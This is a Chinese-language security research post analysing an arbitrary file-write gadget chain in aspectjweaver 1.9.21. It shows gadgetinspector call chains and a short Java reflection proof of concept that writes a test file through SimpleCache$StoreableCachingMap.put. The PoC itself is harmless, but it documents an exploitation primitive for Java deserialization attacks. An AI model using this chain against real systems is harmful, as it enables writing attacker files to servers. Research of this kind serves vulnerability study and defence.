aspectjweaver文件写入的一些发现
最近分析aspectjweaver该java组件链的一些发现记录
所用到环境
windows
java环境 1.8.0_291
aspectjweaver 1.9.21
使用到依赖
<dependencies>
<dependency>
<groupId>commons-collections</groupId>
<artifactId>commons-collections</artifactId>
<version>3.2.2</version>
</dependency>
<!-- https://mvnrepository.com/artifact/org.aspectj/aspectjweaver -->
<dependency>
<groupId>org.aspectj</groupId>
<artifactId>aspectjweaver</artifactId>
<version>1.9.21</version>
<scope>runtime</scope>
</dependency>
</dependencies>
使用gadgetinspector工具获得以下链
org/apache/log4j/spi/LoggingEvent.readObject(Ljava/io/ObjectInputStream;)V (1)
org/apache/log4j/spi/LoggingEvent.readLevel(Ljava/io/ObjectInputStream;)V (1)
java/lang/reflect/Method.invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object; (0)
com/sun/corba/se/spi/orbutil/proxy/CompositeInvocationHandlerImpl.invoke(Ljava/lang/Object;Ljava/lang/reflect/Method;[Ljava/lang/Object;)Ljava/lang/Object; (0)
org/aspectj/weaver/tools/cache/SimpleCache$StoreableCachingMap.get(Ljava/lang/Object;)Ljava/lang/Object; (0)
org/aspectj/weaver/tools/cache/SimpleCache$StoreableCachingMap.readFromPath(Ljava/lang/String;)[B (1)
java/io/FileInputStream.
java/security/cert/CertificateRevokedException.readObject(Ljava/io/ObjectInputStream;)V (1)
org/aspectj/weaver/tools/cache/SimpleCache$StoreableCachingMap.put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object; (1)
org/aspectj/weaver/tools/cache/SimpleCache$StoreableCachingMap.storeMap()V (0)
java/io/FileOutputStream.
java/security/cert/CertificateRevokedException.readObject(Ljava/io/ObjectInputStream;)V (1)
java/util/Collections$CheckedMap.put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object; (1)
org/aspectj/weaver/tools/cache/SimpleCache$StoreableCachingMap.put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object; (0)
org/aspectj/weaver/tools/cache/SimpleCache$StoreableCachingMap.writeToPath(Ljava/lang/String;[B)Ljava/lang/String; (0)
java/io/FileOutputStream.
org/apache/log4j/pattern/LogEvent.readObject(Ljava/io/ObjectInputStream;)V (1)
org/apache/log4j/pattern/LogEvent.readLevel(Ljava/io/ObjectInputStream;)V (1)
java/lang/reflect/Method.invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object; (0)
java/security/cert/CertificateRevokedException.readObject(Ljava/io/ObjectInputStream;)V (1)
org/aspectj/weaver/tools/cache/SimpleCache$StoreableCachingMap.put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object; (1)
org/aspectj/weaver/tools/cache/SimpleCache$StoreableCachingMap.writeToPath(Ljava/lang/String;[B)Ljava/lang/String; (1)
java/io/FileOutputStream.
实际使用到的相关链
org/aspectj/weaver/tools/cache/SimpleCache$StoreableCachingMap.writeToPath(Ljava/lang/String;[B)Ljava/lang/String; (1)
对应查找到SimpleCache->StoreableCachingMap
发现重写put方法
继续查看writeToPath方法具体实现
(
因此可以联想到利用缺陷 key对应的D:// value对应1.txt 然后是具体内容
public Object put(Object key, Object value) {
)
然后进行利用实现,
1首先通过反射类加载 “org.aspectj.weaver.tools.cache.SimpleCache$StoreableCachingMap”
2设置私有属性可见 con.setAccessible(true);
3实例化对象 HashMap map = (HashMap)con.newInstance("D://", 1);
4最后调用其put方法, Object value=map.put("1.txt","111".getBytes(StandardCharsets.UTF_8));
Constructor con = Class.forName("org.aspectj.weaver.tools.cache.SimpleCache$StoreableCachingMap").getDeclaredConstructor(String.class,int.class);
con.setAccessible(true);
HashMap map = (HashMap)con.newInstance("D://", 1);
Object value=map.put("1.txt","111".getBytes(StandardCharsets.UTF_8));
最后完成文件的写入
